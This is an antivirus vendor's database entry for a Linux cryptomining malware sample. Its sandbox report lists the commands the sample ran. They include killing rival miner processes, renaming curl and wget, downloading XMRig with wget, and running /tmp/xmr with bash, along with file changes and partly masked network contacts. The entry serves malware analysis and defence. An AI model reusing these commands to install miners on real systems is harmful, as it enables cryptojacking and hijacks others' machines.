Linux.Siggen.6926

Linux.Siggen.6926

Добавлен в вирусную базу Dr.Web: 2024-04-09

Описание добавлено: 2024-04-09

Technical Information

Malicious functions:

Launches itself as a daemon

Launches processes:

cp /usr/bin/curl /usr/bin/curl1&
cp /usr/bin/wget /usr/bin/wget1&
ps -ef | grep .daemond | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
ps -ef | grep /opt/yilu/work/xig/xig | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
ps -ef | grep monero | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
tar -zxvf xmrig-6.21.2-linux-static-x64.tar.gz
grep /usr/bin/.sshd
kill -9
/usr/bin/mawk awk {print $2}
/tmp/xmr
grep .daemond
<SAMPLE_FULL_PATH> -deamon
grep ddg
ps -ef
grep monero
ps -ef | grep pool. | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
grep xmr
killall xmr
grep kworker34
ps -ef | grep Circle_MI | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
ps -ef | grep prohash | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
ps -ef | grep /usr/bin/.sshd | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
ps -ef | grep kworker34 | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
ps -ef | grep /opt/yilu/mservice | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
ps -ef | grep tcp: | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
grep miner
grep /tmp/thisxxs
cp /usr/bin/curl /usr/bin/curl1
grep /opt/yilu/mservice
chmod +x /tmp/xmr
gzip -d
/bin/bash /tmp/xmr
grep tcp:
grep /opt/yilu/work/xig/xig
ps -ef | grep x86_ | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
ps -ef | grep cryptonight | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
grep /usr/bin/bsd-port/getty
grep -v grep
grep x86_
ps -ef | grep stratum | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
ps -ef | grep /tmp/thisxxs | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
grep cryptonight
ps -ef | grep ddg | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
grep Circle_MI
ps -ef | grep /usr/bin/bsd-port/getty | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
ps -ef | grep miner | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
wget https://github.com/xmrig/xmrig/releases/download/v6.21.2/xmrig-6.21.2-linux-static-x64.tar.gz
ps -ef | grep xmr | grep -v grep | awk \x27{print $2}\x27 | xargs kill -9
xargs kill -9
grep prohash
cp /usr/bin/wget /usr/bin/wget1
grep pool.
grep stratum

Performs operations with the file system:

Modifies file access rights:

/tmp/xmr
/tmp/xmrig-6.21.2/config.json
/tmp/xmrig-6.21.2/SHA256SUMS

Modifies file owner:

/tmp/xmrig-6.21.2/config.json
/tmp/xmrig-6.21.2/SHA256SUMS

Creates folders:

/tmp/xmrig-6.21.2

Creates or modifies files:

/usr/bin/wget1
/tmp/config.json
/tmp/xmr
/tmp/xmrig-6.21.2-linux-static-x64.tar.gz
/root/.wget-hsts
/tmp/xmrig-6.21.2/config.json
/tmp/xmrig-6.21.2/SHA256SUMS
/tmp/xmrig-6.21.2/xmrig

Locks files:

/root/.wget-hsts

Changes time of creation/access/modification of files:

/tmp/xmrig-6.21.2-linux-static-x64.tar.gz
/tmp/xmrig-6.21.2/config.json
/tmp/xmrig-6.21.2/SHA256SUMS

Network activity:

Awaits incoming connections on ports:

127.0.0.1:14747

Establishes connection:

8.#.8.8:53
14#.##.121.4:443
18#.##9.108.133:0
(e##val)
18#.##9.109.133:0
18#.##9.110.133:0
18#.##9.111.133:0
18#.##9.108.133:443

DNS ASK:

gi##ub.com
ob#####.#ithubusercontent.com

Sends data to the following servers:

14#.##.121.4:443
18#.##9.108.133:443

Receives data from the following servers:

14#.##.121.4:443
18#.##9.108.133:443

Other:

Collects OS information

Collects CPU information

Collects RAM information

Collects information about network activity

Технологии

Термины

Обучение и просвещение

Мифы

Technical Information

Рекомендации по лечению